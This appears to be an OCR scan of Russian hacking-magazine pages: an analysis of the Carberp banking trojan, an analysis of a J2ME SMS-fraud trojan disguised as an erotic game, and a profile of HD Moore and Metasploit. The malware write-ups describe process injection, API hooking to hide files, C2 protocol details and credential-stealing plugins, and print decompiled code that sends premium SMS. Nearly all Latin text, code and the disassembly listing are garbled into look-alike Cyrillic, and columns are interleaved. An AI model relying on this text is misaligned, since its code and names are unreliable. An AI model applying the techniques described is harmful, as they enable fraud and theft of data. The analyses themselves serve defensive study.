чие хуков в необходимых ему АР|!-функциях. 

В более новой версии Сагбегр’а нами был обнаружен другой спо- 
соб заражения порожденного процесса ехр{огегехе. Первые шаги 
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остались неизменными — сначала создается глобальная секция, 
которая мапится в дочерний процесс, и туда копируется вредо- 
носный код. А дальше вызывается недокументированная функция 
[м@чцецеАрсТВгеаа, которая ставит в очередь на выполнение в 
ехр(огег’е асинхронный вызов одной из вредоносных функций, 
находящихся в образе секции. При вызове /м/Кезите Тгеад 
начинается выполнение вредоносного кода. 


Игра в прятки 


Прежде чем обсуждать функции, которыми может похвастаться 
данный вредонос, стоит разобрать еще несколько интерес- 

ных моментов его жизни. Конечно же, как и любой уважающий 
себя вирус, СагБегр прописывается в автозагрузку, причем 
банально копируя себя под случайным именем в директорию 
%НОМЕОВВМЕ%\%НОМЕРАТН% \5{аг{Мепи\Ргодгатя\${аг{Чр\. Тем 
не менее, не все так просто! В вирусе предусмотрен механизм, 
позволяющий скрыть присутствие файла в системе. 

После внедрения трояна в дочерний ехрогег.ехе, вызывают- 
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Так выглядит подмена функций 


ся механизмы, которые инжектируют его в исходный ехр(огег. 
Сначала происходит поиск Р!О-процесса. Стоит отметить, что в 
программе заложено два способа поиска. Первый способ заклю- 
чается в последовательном вызове функций Ета\/пдом ["бВец_ 
Тгау\\па", 0] и бе\/\/пдом/ТАгеа9Ргосе$$14 [В\/па, &14], таким 
образом, в переменной 14 должен появиться нужный РО. Если 
же по какой-то причине функция вернула «!9=0», то происходит 
обыкновенный перебор процессов и поиск нужного. 

Когда заветный Р.Ш найден, программа внедряется в 

ехр[огег давно известным способом — (м\/ОрепРгосез$ + 
\гкеРгосезМетогу. Также вредонос делает хук двух функций в 
захваченном процессе — №{0чегу/гецогуЕЦе и \{КезитеТВгеаа 
из библиотеки п1ац.а(Ц. Чтобы уйти от детекта некоторыми анти- 
руткитами [например, Косо{КиУпроокКег), хук делается не совсем 
стандартным способом. Троян подменяет не адрес нужной функ- 
ции, а адрес функции КЕаз{5у${етСаЦ (см. рисунок]. 

Так для чего же подменяются функции? №{0чегуПигестогуЕЦе 
перебирает все файлы, находящиеся в директории. Она вызы- 
вается почти во всех программах (в том числе в ехр(огег и ста] 
при обзоре каталогов файловой системы. Ее подмена необходима 
для того, чтобы скрыть факт присутствия файла. №{КезитеТВгеаад 
вызывается ехр(огег’ом при смене директории и при (!} запуске 
приложения. Таким образом, если ехр[огег заражен, то при запу- 
ске любого приложения вредоносная «закладка» определяет РО 
запускаемого процесса и инжектится в него, также подменяя 
вышеупомянутые функции. Легко понять, что при старте системы 
троян автоматически запускается, заражает ехр{огег, а соответ- 
ственно и все порожденные им процессы. 

На этом заканчивается список средств защиты, используемых 
Сагрегр’ом. Полный список средств защиты, применяемый этим 
трояном, приведен в таблице 2. 


Начинка 


Разобравшись со всеми защитными механизмами трояна, мы 
приступили к изучению вирусной начинки. Оказалось, что в нем 
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имеет место вполне стандартный функционал похищения пользо- 


вательских данных, сравнимый с функционалом того же |ВапК’а 
или Гец5’а и дополненный неплохим протоколом обмена данных 
между компьютерами жертвы и злоумышленника. Собирая по 
всей системе пользовательские сертификаты, пароли к учетным 
записям и прочей ключевой информации, добытые с помощью 
работающего кейлоггера и снятия скриншотов рабочего стола, 
вредонос упаковывает все найденное в саб-архив и готовит его к 
отправке. 


общение с хозяином 


Теперь посмотрим на реализованный в трояне протокол обмена 
данными. Условно в нем можно выделить этап установки соеди- 
нения и непосредственно рабочий этап обмена информацией. 


Этап установки соединения 
1 — Зараженный компьютер: 

1. Установка соединения с сервером 1. 

2. Отправка строки СЕТ-запросом, предусматривающей ука- 

зание параметров: 
® ирите; 
® Чом/пипК: 
® припк; 
® | [зашифрованная строка, содержащая информацию о 
зараженной системе}; 
® ${а{ра$з$ [начальный пароль}; 
® соттеп(. 

Вот пример такого запроса: 
/ зфае?ир*1те=<‹\уа11>&аомп11пК=<\а12>&ир11пК=<\а13> 
&14=<\уа14>&5фафра55=<\а15>&соттеп*=<\а16> 

3. Ожидание приема информации от сервера. 


2 - Сервер злоумышленника: 
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А воти пропатченные байтики в ехрюгег ехе 
Этап передачи данных 


.Еехе: 00414534 @ы0-9_\1453. — 00 ЗЕ5 ОЗС ; ОйТА ХАЕР: 546_\008Р0*ВСТо 1 — Зараженный компьютер: 
„Хехе: 00414538 ат од4и$Раз5 96 ‘ШТ: 35° ,00В,бАВ — ; ОПТ ХВЕЕ: зы6 №088Р0*15ЕТо 10 РОЗТ 2 
„Бозе -00414538 96 ‘топ: 35°, бп, Ой . отправка строки -запросом на сервер 2, предусма- 
„Еее: 00414538 6 ‘Раззиоео: %5°, ОП, ОАВ ы 
„ЕРЫЕ: 00414538 96 ‘ЦзоейоепЕ: $5‘ „бон, ОАИ, 0 тривающеи указание параметров: 
„Вох: О бАТЩОЬЙ 2110 4 
„ЕехЕ: 00414566 а1оглаЕТоп_Ех 96 *1пРогра от. ЕхЕ*,0 ; ОЙТА ХЯЕР: эы6_ОВ8Р ОРУТ ® относительного пути, по которому на сервере злоумыш- 
„КехЕ:ОвАТи57С азснееп_]ред — 96 ‘всгееп. ред", ; ОАТА ХИЕР: 546 МОВВР0*27ЕТо В 
„Тех: 00414588 аР1орру 6 ‘ГТорру“, 0 ; ОЙАТй ХАЕР: ЗЫ ВОВЕ 0+200То ленника будут располагаться переданные фа илы; 
„ЕехЕ: 00414582 аэ14 дп 108 
`ехЕ: 00414590 ай ЧБ 4:0 ; ОАТИ ХЯЕР: зив_мОВЯЕ 0+2Е2То ® зашифрованная строка, содержащая закодированную 
„ЕехЕ: 00414505 2110 и с 
„Еехе:0041459% аР1орру_0 95 "Р1орру*,0 ; ОАТЯ ХНЕЕ: 506_№0В8Р 0*395Т0 строку с информацией о системе И. кодовое слово. 
Е э11 дп & 
„ЕехЕ:0041459С ай_0 96 °й:*,0 ; ОЙТИ ХАЕР: 5и6_№ 068 О*+З9ЯТО Переда ваемая строка может выглядеть так: 
„КехЕ: 004145 9Е э14 ут 10 . 
„Вен: Общей асопбобох 96 "Сорбовох* 0 ; ОАТА ХНЕР: 5ыб М ОВЕВО+ВТо 1 | ра11аа1п | 05845905А93Е7048В83430385ААЕВЙ7ЭАЕТ | 90 | 90 
„ЕохЕ:ОбилЩЬЙЯ а110п № 
„Кох: ОвАТАЗИС аЕОЧЕ ЧБ "ЕННЕ",0 ; ОйТЯ ХАЕР: 506 _МОВЕВО*9ЕТо А зашифрованная следующим образом: 
„ЕоХЕ: 00414581 21101 & 
„ЕехЕ:0041458% аКеуНале$КеуРаз 96 ‘Кеу папе: %5' „00, ОА ; ОАТЯ ХВЕЁР: 546 м 0ВЕВ0+108То а=е15е327а+46а915с150014а284с052787еа7а63с8с40Б1 
„ЕехЕ: ОбАТАЗВА 96 “Кеу раззмого: 35,00, ОЙВ 
‘дехе:обатьвь 4 ‘Кеу рати: Знс* „вол, = аздсаеа6668е707660+6601861783а++Е7сьса429е676а47 
„КехЕ:ОвАТАЗЕЬ атпроглаЕот__ 0 66 *ТпРоглаЕЗ от. ЕхЕ",0 —; ОЙТА ХВЕЕ: 556 _ВОВЕВО+20ВТо 
„Кох: ООАтА5ЕН а5сгееп_)ред_б ЧБ "зсгееп. ред” ,0 $ РАТИ ХЯЕЕ: зи0_ВОВЕВО*351То Шифрование строки сопровождается дополнением избыточ- 
„ЕехЕ: 00411600 азесгеЕ Ку 96 ‘зесееЕ.Кеу“,й ; ОАТИ ХЯЕР: 56 _МОВЕВО:10с_Ч0С276То 
„ох: 00414608 2110 и НОСТИ 
„ЕехЕ:0041460С а$ Ч *[%5]",0 ; ОйТА ХВЕР: 546_№0С390*ЕВТо | 
кхе: ОАО а | 2. Отправка сформированного .саб-файла с похищенной 
„ЕехЕ:00414618 аРОЗеСЗНЕЕр1__3 06 "РОЗТ /%с/$5 НТТР/1. 0”, ООВ, ОАВ ; ОЙТИ ХАЕЕ: зи _Н0С6ЕО+1ОТо 
„ЕРХЕ: 00414618 ЧБ “НозЕ: 15°, ООН, ОИ у 
„ЕехЕ:004146518 96 “Цзег-йдетЕ: %5' „0, бЯн информацией серверу 2. 
„ЕР: 00414618 96 "АссерЕ: Еехе/нЕт " „ОО, АВ 
рее р РЖ 61056 бОВ ВЯВ <: Периодически происходит проверка установленного 
„ЕехЕ:00414618 96 "СолпеепЕ-Туре: арр1еаЕТопих ним Рора-огТепсое0 „ОО, ОПВ у 
Кох 00414618 ОБ 'СопеепЕ-Гепоеь: %0° „во, ОАВ соединения. Данное деиствие аналогично предыдущему, за 
исключением того, что передается строка: 
Граф из ОЕ проанализированной второй части нашего а | спеск | ееоееооееооеесооеовеоесвоееввеев | 
криптора 2 — Сервер: 
1. На стороне сервера осуществляется расшифровка при- 
1. Отправка информации зараженному компьютеру. Могут нятого сообщения. Отправка уведомления об успешном 
быть отправлены следующие коды: приеме проверочного пакета. 
е ОК; 2. Отправка информации зараженной машине. Вот что сер- 
ы бараз$; вер может отправить в зависимости от версии троянца (см. 
® 5е551оп: <№ сессии>. таблицу 3). 
3 — Зараженный компьютер: 3 — Зараженный компьютер: 
1. Распознавание полученной от сервера информации: 1. Распознавание принятой информации (см. таблицу 4]. 
® ок — соединение установлено; 
® рара5$, зез$1оп — повторная передача начальной Надо сказать, что передачу информации Сагбегр осуществля- 
информации от сервера. ет грамотно: инициализация связи сопровождается зашитым в 


В ранней версии: В новой версии: 


ОО ОИ 


Таблица 3. Информация, отправляемая трояну сервером, в зависимости от версии 
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троян паролем, состояние канала связи периодически проверя- 
ется специальными пакетами, передаваемая информация шифру- 

ется, а шифротекст при этом наполняется избыточностью. Более 

того, возможно удаленное управление зловредом — в разбирае- 

мой нами версии присутствовал функционал по разбору команд < 
от удаленного сервера. Здесь вирусописатели предусмотрели 
возможность обновления вируса, возможность самоудаления и 1есе@ сотрщег 
загрузки дополнительных модулей. Кстати, последние направле- 
ны на целевые банковские системы. Заполучить образец такого 
модуля нам, к сожалению, не удалось, но с высокой вероятностью 
в нем можно обнаружить механизм перехвата выполняемой кли- 
ентом транзакции и подмены страниц аутентификации на стра- 
ничках интернет-банкинга. 


Дополнительные возможности 


Дополнительную убойность троянцу добавляют специальные <> 
плагины, которые он загружает вдобавок к основному функцио- 


[пгесфед согпривег 
налу. На момент исследования у нас было три зашифрованных 


плагина с символичными именами пипгау.р\и9, КЩау.р 9 и 
раз$\/.р(ид (именно в таком виде их удалось достать с сервера, й р 
с которым Сагбегр взаимодействует]. Потратив немного време- Этаре 2: Райа гап${еггт 
ни на исследование шифрованных файлов и написание к ним 

декриптора на языке ру{Поп, удалось выяснить, что содержи- 

мое этих плагинов соответствует их названию. Действительно, 

гппгау.р(и9 занимается устранением конкурентов — если на < Зело, 

компьютере жертвы помимо Сагбегр’а присутствует другой злов- |тесцед сотрщег 
ред, например, тот же самый Гец$, то последний безжалостно 


удаляется из системы. Плагин КЩау.рид нейтрализует работу 
антивирусных систем, ну а раз$\/.р{ид способен перехватывать 
вводимые пользователем пароли. 


Заключение 


Итак, мы немного рассказали о защитных трюках трояна, о 


МаеГастог' $ зегмег 


весьма элегантном способе заражения других процессов, нако- 

нец, непосредственно о его вредоносном функционале. Налицо <> 
эволюция технологий сокрытия от антивирусных эвристик и 
сигнатур. К слову, на момент начала исследования далеко не все 1птескед сотричег 
антивирусные продукты могли отнести файл к классу вредонос- 
НЫХ. Поэтому надо держать руку на пульсе — уже сейчас некото- 
рые вирусные аналитики предполагают стремительное развитие 


Сагбегр'а. 52 Иллюстрация работы троянского протокола 


Ранняя версия Новая версия Описание 

ирдае Скачивает РЕ-файл с новой версией трояна с удаленного 
сервера и устанавливает его в систему 

дехес Скачивает дополнительный РЕ-файл с удаленного сервера и 
производит его запуск 


а ааа! Скачивает дополнительную библиотеку с плагином, которая 
подгружается в контекстную память троянского процесса 
дгаббег Осуществляет сбор различных данных из системы 


Таблица 4. Распознавание принятой информации 


Кот КИизег Удаляет трояна из системы 
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=5 Рис. ]. 
Фрагмент 
работы 
зловреда под 
эмулятором 
Зроу сразу 
после 
запуска =>! Рис. 2. 
Фрагмент 
работы 
]2МЕ- 
зловреда 
во время 
«игры» под 
эмулятором 
Збоу 


Рассматриваем «эротич ский» )2МЕ-зловред 
во всех интимных подробностях 


© Во всех предыдущих статьях из этой рубрики совсем не 
упоминались мобильные зловреды. Однако они существуют и, 
вопреки расхожему мнению, наносят неплохой урон кошельку 
пользователей. Поэтому в этой статье я разберу троянца для 
мобильных телефонов, маскирующегося под игру эротического 


содержания. 


Итак, подопытный - зловред под /ауа 2 Мсго Ед№от (42МЕ). Напомню 
читателям, что именно эту платформу для запуска приложений 
использует подавляющее большинство обычных мобильных теле- 
фонов [это те, которые НЕ смартфоны :]]. Ее популярность более чем 
высока. Прежде чем начать разбор непосредственно файлов, я решил 
запустить зловред под эмулятором $]боу. Вот как будет выглядеть 
экран реального мобильного телефона сразу после запуска сэмпла 
(см. рис. 1). 

Как мы видим - это приложение позиционирует себя как игра. При 
этом пользователю любезно сообщается о факте содержания эроти- 
ческого контента. Конечно же, все это сделано исключительно для 
отвлечения внимания. А теперь - прочитаем правила игры (выдержка, 
орфография оригинала сохранена]: 


«Это уникальная эротическая игра на ваш мобильный, которая 
не имеет аналогов. Цель игры - нужно чем быстрей, тем лучше 
раскрыть мозаику из цветных квадратов, для того что бы 
увидеть спрятанную за ней картинку эротического содержания. 
Для уничтожения квадратов на экране Вам необходимо нажимать 
кнопку «Жми»». 


Вроде бы, ничего особенного - игра как игра. Но подождите, что там 
еще написано (выдержка, орфография опять-таки сохранены): 


«Данная программа изначально создана для регистрации, 
которая открывают вам доступ к платному закрытому архиву 
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эротических загрузок, которые доступны лицам с 18 и лет 

и более. Саму программу Вы качаете бесплатно, оплата 
происходит только за трафик по тарифу вашего оператора, а 
за отправленное сообщение платите, Внимание стоимость смс 
сообщений отправку которых запросит приложение состовляет: 
на номера 5370 --10.31$ (15 дней), 5373 -4.57$ (7 дней), 
7250 --3.64$ (3 дня) т.е текст: 
касается только закачки приложения, а за сообщения которое 


«скачать бесплатно» на сайте 


отсылает приложение, вы платите. Приложение запросит 
отправку $т$!!! Чтобы зарегистрироваться в закрытом 
эротическом архиве, Вы нажимаете «Да». Достаточно нажать 
один раз, нажмете 2 раза снимут со счета, как за 2 $т$, и если 
нажмете 3 раза, то сумму снимут 3 раза соотвественно. В слу- 
чае если Вы отправите 3 смс подряд, то Вы получаете дополни- 


тельную неделю доступа бесплатно! ... » 


Так что же получается? Это не игра, а программа для получения 
доступа к платному контенту?! Кажется, что бояться вроде бы нече- 
го, так как ОС обязательно спрашивает у пользователя, согласен ли 
он отправить СМС. Но здесь злоумышленники немного схитрили. 
Суть игры заключается в том, что нужно очень быстро кликать на 
кнопку «жми», чтобы успеть открыть картинку. В определенный 
момент игры появляется подтверждение об отправке СМС, но 
увлеченный игрок так рьяно жмет на кнопку «жми», что попутно 
нажимает и кнопку «согласен». Сразу после этого с его счета неза- 
медлительно списывается энное количество денег. 
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Как это работает? 


А теперь - о том, как это работает изнутри. Программы под эту плат- 
форму выполнены в виде }АК-файлов. Последние представляют 
собой обычный /1Р-архив, который можно распаковать. После рас- 
паковки мы увидим «файлы», которые используются приложением. 
Исполнение ./2МЕ-программы начинается с запуска «те. с а$$». 
Файлы «.с[а5$» - это скомпилированный код /]ауа. Можно провести 
аналогию с файлами, содержащими код на С/С++: «.с”/”.срр» компи- 
лируются в «.об]». Лауа <а$5‘ы можно декомпилировать, например, 
при помощи /АВ. Так я и поступил. Да, у этого зловреда, помимо 
«пет. с[а$», присутствовали еще и другие с(а$$`ы, с которыми я 
поступил аналогично. 

Первое, что бросилось в глаза - функция зеп@ Мех те. Название, 
безусловно, говорящее. До этого я говорил, что СМС отправляется не 
сразу, а в определенные моменты игры. Я решил выяснить, как же это 
реализовано. Сама функция вызывается в пта[Е.с[а$$ следующим 
образом: 


1+ (е Боо1еап_Яа) 

и 
е_Боо1еап_ЯА = Ра15е; 
зепаМехЕ$т$ (); 


Из кода видно, что отправка вызывается только в случае, когда буле- 
вая переменная «е_Бос{еап_ 4» принимает значение «гие». Это про- 
исходит только в одном месте в коде: 


1+(1 == 6.6 && тоае > 4 && тоае < 6) 


| 
е.а(е.Р, е.5); 
ев. 6 > ТТ) 
{ 
ий11е(Б.а_1п*_аггау24_$Фа{1с_На[гХ] [гу] == @) 
{ 
пехЕХ(); 
пехЕУ(); 
} 
Ь.а_1пЕ_аггау24_$фа{1с_Яа[гх][г\у] =0; 
Ь.е--; 
с_1пе_Яа = 100 —Ь.+ *Ь.е; 
Е а, о ие 
{ 
е_Боо1еап_ЧА = гие; 
а_1пе_Яа = 9_1п* На + 11; 
} 
пехЕУ(); 
гетигп; 
} е15е { 
а_Ь Яа.а(4.а, пи11); 
а_6_ Яа.5("Поздравляем!"); 
а_6 Яа.а(е_]ауа_1ап=_5%г1па_Яа); 
е.а(е.з, 0); 
а_6_ Яа. зегу1севера1пт*$(); 
а_1опе Йа = Зуз%ет. сиггеп{Т1тем1111$(); 
тоае = 6; 
с_Боо1еап_ЯА4 = гие; 
гетигп; 
- 
} 


Поскольку исходный код у меня, увы, отсутствует, то о назначении всех 
переменных приходится догадываться из контекста. Этот фрагмент 
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кода отвечает за обработку пользовательского нажатия по кнопке 
«жми». Судя по всему, «Б.е» - это количество оставшихся квадра- 

тов в игре. Если их не осталось, то будет рисоваться поздравление: 
«а 6 На.6(«Поздравляем!»};». А если они еще остались, то количество 
квадратов уменьшится на единицу: 6.е--;, и будет произведено даль- 
нейшее рисование «бегающего» элемента. Как видно из кода, булева 
«е боеап_ 4», которая разрешит отправку 5М5, будет выставляться 
только при определенном условии: с_тЕ Ка > а п Ка. Это условие 
будет выполняться ближе к концу, когда «Б.е» станет очень малень- 
ким, а«с_шпЁ_Ца», соответственно, большим: с_1п_Яа = 190 - Ь.+ 
* Б.е. 

Теперь обратимся непосредственно к коду функции зеп9 Меж М5 
(фрагмент: 


51г1п8 $1 =Б ]ауа_1ап=_$%г1п=_Яа; 
5Ег1п8 $ = с _]ауа_1ап_5%г1пв_Я4; 
с С1 =ас 19а; 
5узет.вс(); 
1+(с1.а_)ауа_1ап_ТВгеаа_ЯА == пи11) 
| 
С1.а_Боо]еап_Я4 = Фа15е; 
С1.а_]ауа_1апё_5%г1п_ЯА = $1; 
С = 55:5. 
С1.а_)ауа_1Тапё_ТИгеаа_\Я4 = пем ТВгеаа(с1); 
С1.а_)ауа_1апё_ТИгеаа_Я4. 5%аг*(); 
} 
гу 
| 
Тигеаа. $1еер(3001); 


} 
саесй (Ехсер1оп _ех) { } 


Здесь происходит заполнение полей объекта «с1». Можно понять, что 
в строке «5» содержится номер, куда следует отправить М5, а в стро- 
ке «51» содержится текст отправки. После того, как поля объекта ста- 
новятся заполненными, создается новый поток, которому в качестве 
параметра передается «с1». Обратимся к этому классу: 


Ме55авеСоппес&1оп тез5авесоппес1оп; 

5узет.вс(); 

тез5авесоппес1оп = пи11; 

Тех{Ме$5аде фех{те$$а5е; 

(ТехЕтез5аве = (Тех{Меззаве) 
(теззавесоппес*1опт = (МеззавеСоппес*1оп )Соппес®ог.ореп(Ь)). 
пемМе$5ае ("ТехЕ")).зефАдаге$$ (5); 

Техете$5аре .зе%{Рау1оаЯТех* (а_)ауа_1апа_5$%г1п=_Яа); 

тез5авесоппес*1оп. епа (ех&те$5азе); 


Я специально вырезал только тот код, который отвечает за отправ- 
ку сообщения, чтобы не загромождать статью. Мои предположения 
оказались верными. Так, текст сообщения содержится в строке 
«а_|ауа_[апа_${ппо_Ца»: фехтеззаве . е{Рау1оаЧТех* (а_Зауа_ 
]апё_5%г1п8_Яа)у. А номер, куда произведена отправка в пере- 
менной «6»: (фехтеззаве = (Тех{Мез5аре) (тезаресоппес1оп = 
(Мез5авеСоппес*1оп )Соппес®ог.ореп(Ь)).пемМез5аве ( "техЕ")). 
ееАЧаге$$(Ь);. Сама же отправка реализуется посредством следую- 


щего вызова: пеззадесоппесйоп.зеп9(ех{теззаде);. 


Заключение 


Вот и все - мы описали весь «полезный» функционал этой игры- 
трояна. Оказалось, что любители сомнительного контента могут легко 
попасться на элементарные уловки злоумышленников. Стоит отметить, 
что сам троянец выполнен достаточно качественно: по-видимому, на 
его разработку ушло не так мало времени. Но, что радует, - его разбор 
оказался совсем несложным. == 
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Ш м Мария «МИг (> Нефедова (тИгИИ@геа(.хаКер.ги) 


Начало карьеры 


Родился наш герой в 1981 году в 
Соединенных Штатах звездно-полосатой 
Америки. Кстати, интересный факт — НО 
Мооге, это не псевдоним. Дело в том, что 
первое имя Мура — Эйч [одна буква «Н», 
серьезно}, а второе начинается на «0», вот и 
получаются инициалы. 

В юности Мур успел не раз сменить школу, 
так как из учебных заведений его попро- 
сту выгоняли за неуспеваемость. Если 
посмотреть на биографии других видных 
|Г-деятелей, становится ясно, что подобная 
ситуация в этой среде едва ли не норма. 
Таким людям зачастую бывает скучно учить- 
ся — множество дисциплин они считают 
для себя ненужными и даже не пытаются 
вникать в них. У Мура была схожая про- 
блема. Шанс раскрыться представился ему 
лишь в не совсем обычном учебном заве- 
дении города Остин (штат Техас}. Частная 
школа Гонзало Гарза работала (и по сей день 
работает] с подростками, которые по тем 
или иным причинам не могут найти себя и 
состояться в рамках привычной нам систе- 
мы. Именно там Эйч Ди отыскал свое место, 
а учителя гордо называли его компьютерным 
гением. 

Доподлинно неизвестно, в каком именно 
возрасте Мур заинтересовался поиском 
багов и уязвимостей, везде, где их только 
можно найти. Зато известно, что во время 
учебы в Гарза, будучи подростком 17 лет от 
роду, он уже сумел обнаружить серьезную 
проблему в армейской программе 5НАВО\М/ 
(бесопдагу НеигеНс Апа(уз15 ог Оеепзме 
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10 МООКЕ 


0 Меа$рок и его создателе 


© На сегодня Эич Ди Мур (НО Мооге) — один из наиболее известных 
специалистов в области информационной безопасности на планете. 
Уже вначале 2000-х на сайте известнейшей хак-конференции НТВ 
можно было увидеть анонс, гласившии: «/ нас будетеще один спикер 
— Эич Ди Мур. Еслиты не знаешь, кто это, значит ты вообще не хакер, 
итебе нужно как можно быстрее прочитать его биографию!». А ведь 
самому Муру натот момент было всего 22 года. 


Оп(пе \\/агаге). Мур не только предложил 
решение найденной проблемы, но даже 
проконсультировал по данному вопросу 
Агентство Национальной Безопасности. 
Поправки Мура приняли, в софт внесли 
соответствующие изменения. 

В тот же период времени он обнаружил 
серьезную дыру в почтовом сервисе Уароо. 
Как истинный м/ПКе Ва Эйч Ди сообщил о 
дырке в УаВоо и продемонстрировал одному 
из сотрудников компании, как при помощи 
этой уязвимости можно пробраться в систему 
и прочитать чужую почту. Все было принято к 
сведению и исправлено. 

Неудивительно, что после такого Мура 
заметили, и уже в столь юном возрасте он 
начал сотрудничать с Сотрщег 5‹епсез 
Согрогайоп и Армией США на контрактной 
основе. Сам Эйч Ди признается, что ему 
всегда нравилось ломать и разбирать все 
подряд, и, по сути, он до сих пор занимается 
именно этим, просто используя для этого 
более продвинутые и автоматизированные 
методы. 

В последующие годы Мур продолжал совер- 
шенствоваться в нелегком деле тестов 

на проникновение, поиска уязвимостей и 
создания эксплоитов. Именно так, в про- 
цессе контрактной, фрилансерской работы, и 
родилось его самое известное (но не един- 
ственное} детище — Меазр(ок. Если ты не 
знаешь, что это такое, то этот журнал, навер- 
ное, попал к тебе в руки по ошибке, и ты, как 
писали парни с НТВ, «не хакер» :]. Впрочем, 
восполнять пробелы в знаниях никогда не 
поздно, так что позволь все же привести 
короткую справку. 


Проект Меазр(о появился на свет в 2003 
году, и создателем его первой версии 
выступал лично Мур. Исходно он затевал 

это исключительно для себя и ради соб- 
ственного удобства, но впоследствии идея 
развилась в серьезный бизнес, а М&азрои 
Егагпем/огк стал одним из наиболее извест- 
ных продуктов в своей области. Это закон- 
ченная среда для создания, тестирования и 
использования кода эксплоитов. Она обеспе- 
чивает надежную платформу для испытаний 
на проникновение, разработки шеллкодов и 
исследования уязвимостей. Помимо прочего 
проект включает в себя базу опкодов, архив 
шеллкодов и информацию по исследованиям 
компьютерной безопасности. Официальная 
страница Мура (ВИр://'о{аюНепзе.пе] сове- 
тует относительно Меазр[ок Егате\могк бук- 
вально следующее: «Профессионалы в обла- 
сти сетевой безопасности могут использо- 
вать М&азрой для проведения пен-тестов, 
системные администраторы — для проверки 
установленных патчей, производители — для 
регрессивного тестирования, исследователи 
в сфере ИБ со всего мира тоже наверняка 
сумеют найти Меазр[о( применение». 
Меазр(ок способен функционировать прак- 
тически на любой платформе, привязки к 
чему-либо конкретному у него нет. По при- 
знанию Мура, самой экзотичной системой, 
на которой когда-либо запускали его про- 
дукт, были наручные часы с какой-то хитрой 
модификацией [тих на борту. Такими извра- 
щениями занимался один участник конфе- 
ренции 5ОЧБСЕ в Бостоне. 

Первая версия «Метасплоита» была написа- 
на на Рег| и содержала псевдографический 
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интерфейс на базе сигзез. Впоследствии, в 
2006 году, когда к Эйч Ди присоединились 
другие разработчики, была основана компа- 
ния Ма&азрок ЕС, и творение Мура почти 


дателя. Таковым для него стала компания 
ВгеактоаРот\, по сей день занимающаяся 
вопросами безопасности в киберпростран- 
стве. Умные руководители ВгеактоРо!т\ 


В последующие годы Мур продолжал 
совершенствоваться в нелегком деле 
тестов на проникновение, поиска 
уязвимостей и создания эксплоитов 


полностью переписали на Кифу (с некото- 
рыми частями на ассемблере, РуВоп и С}. 
Словом, это своеобразное (ЕСО для хакеров, 
скрипткидисов, тестеров и примкнувших к 
ним сограждан. 


Маеазрюн и не только 


Однако неизвестно, как могла бы сло- 
житься карьера Мура и судьба проекта 
Меазр(ок, если бы Эйч Ди в 2005 году не 
повезло найти себе понимающего работо- 
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решили, что побочные проекты Мура не 
только не вредны, но и полезны компании, 
так как помогают улучшить качество их соб- 
ственной продукции и заслужить больший 
кредит доверия у клиентов. В целом, все 
так и вышло. Эйч Ди на протяжении 4 лет 
занимал в компании должность директора 
подразделения по исследованиям в сфере 
безопасности, «Метасплоит» развивался, 
продукция ВгеактоРо!т{ тоже. 

В те годы на рынке информационной 
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безопасности, по словам Мура, царила 
«великая депрессия». Многие из тех, кто 
раньше открыто публиковали информа- 
цию и с радостью делились ею, находили 
себе работу, или напротив — бросали это 
занятие. Частные компании, в свою оче- 
редь, все чаще стали занимать позицию: 
«А зачем мы будем делиться со всеми 
этой инфой, если мы может продать ее в 
1Ое!еп$е?». Идея же Ма&азрок, напротив, 
состояла в разработке инструментария и 
фреймворка для быстрого создания экс- 
плоитов, так сказать, для всех и каждого. 
В этом вопросе Муру и его коллегам, в 
известной степени, повезло — в то же 
самое время понемногу начала возрастать 
информированность людей о необходимо- 
сти такой простой вещи, как пен-тестинг, а 
в данной области инструменты подобные 
Меазр[оК просто необходимы. Весьма 
интересно и то, что Мур всегда смеялся и 
продолжает смеяться над теми, кто полага- 
ет, что после обнародования уязвимости (и 
тем более эксплоита], обязательно случится 
«что-то плохое». Он искренне считает, что 
эксплоиты, а также информация о багах и 
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ргокьс? . Ану Тез Гав * Ассони. пит у Абтиизгацов * ЗррюнСете: 
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Тагдет зуз1ет зТати5 


®Ф 17-0О5сомегед 
®Ф 4- Зпеед 
® ОМегз 


Рго]ес{ АсНуу (24 Ноуг5) 


Маазрой для профессионалов 


дырках должны быть общедоступны, ведь это, напротив, помогает 
безопасникам в их работе. Разумеется, здесь нужно заметить, что 
публиковать такие данные Мур считает возможным лишь после 
того, как о них оповещен производитель софта и СЕКТ. 

Лишний раз востребованность проекта подтвердилась в 2009 году, 
когда Меазр[ок был приобретен фирмой Кар!а7, занимающейся 
управлением уязвимостями. Подробности этой сделки неизвестны, 
но Эйч Ди Мур покинул ВгеактаРо!т\, занял в Кар!а7 кресло руко- 
водителя службы безопасности, одновременно оставаясь и главным 
архитектором «Метасплоита». 

После покупки компании многие ожидали изменений к худшему и 
как минимум тотальной коммерциализации, но этого не произошло. 
Меазрои Егагптемогк по-прежнему бесплатен, хотя и появилась 
платная версия Меазр[ои Ехргез$, лицензия на которую стоит 
$3000 в год, а также Меазр(ой Рго, который распространяется 
среди партнеров компании. Кстати, незадолго до слияния, а именно 
в 2008 году, лицензия Меазр( ок Егатпемогк 
была сменена с проприетарной на В$О. Мур 
по сей день подчеркивает во всех интервью, 
что проект был, есть и останется ореп-$очгсе. 
Для Мура и его детища это слияние стало 
переходом на новый, уже совсем серьезный 
уровень. М&азр(ой укрепил свои позиции, 
отчасти монетизировался и на сегодня явля- 
ется одним из наиболее известных и востре- 
бованных инструментариев в своем роде. В 
Кар!а7, которая теперь управляет проектом, за 
последние годы было вложено 9 миллионов долларов инвестиций 
со стороны известных в Кремниевой долине венчурных фондов. Это 
явно свидетельствует о том, что аналитики и бизнесмены с опти- 
мизмом смотрят на будущее Меазр1ок. С финансами, кстати, связан 
еще один забавный факт. Мур не раз признавал в интервью, что 
«Метасплоит» нашел отклик и у андеграунда компьютерного мира, 
где он многим полюбился. Раньше, в начале и середине 2000-х, 

для команды проекта было вполне нормально получить $5 000 с 
неизвестного российского РауРа|{-аккаунта в виде пожертвования. 
На контакт такие анонимные благодетели идти не желали, на все 
вопросы отвечали, что им ничего не нужно, а деньги были «просто 
так, наслаждайтесь». 
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Орегайта 5узтетез (Тор 5) 


Мевмогк 5еглсе$ (Тор 5) 


®Ф 43-ОСЕАРС Земсез 
® 27-3МВ Зеглсез 

® 15-МЕТВЮЗ Зегмсе5 
® 14-НТТР Зеплсез 

Ф 10-0Ом3 Зегмсаз 


В 2010 году Кар!а7 и компания 5АМ$ договорились о сотрудни- 
честве и открыли курсы по обучению работе с инфраструктурой 
Меазр{ок Егапптемогк. Обучение доступно в любых форматах: 

путем личного общения с инструктором, общения в реальном вре- 
мени через интернет или даже в виде самостоятельного онлайн- 
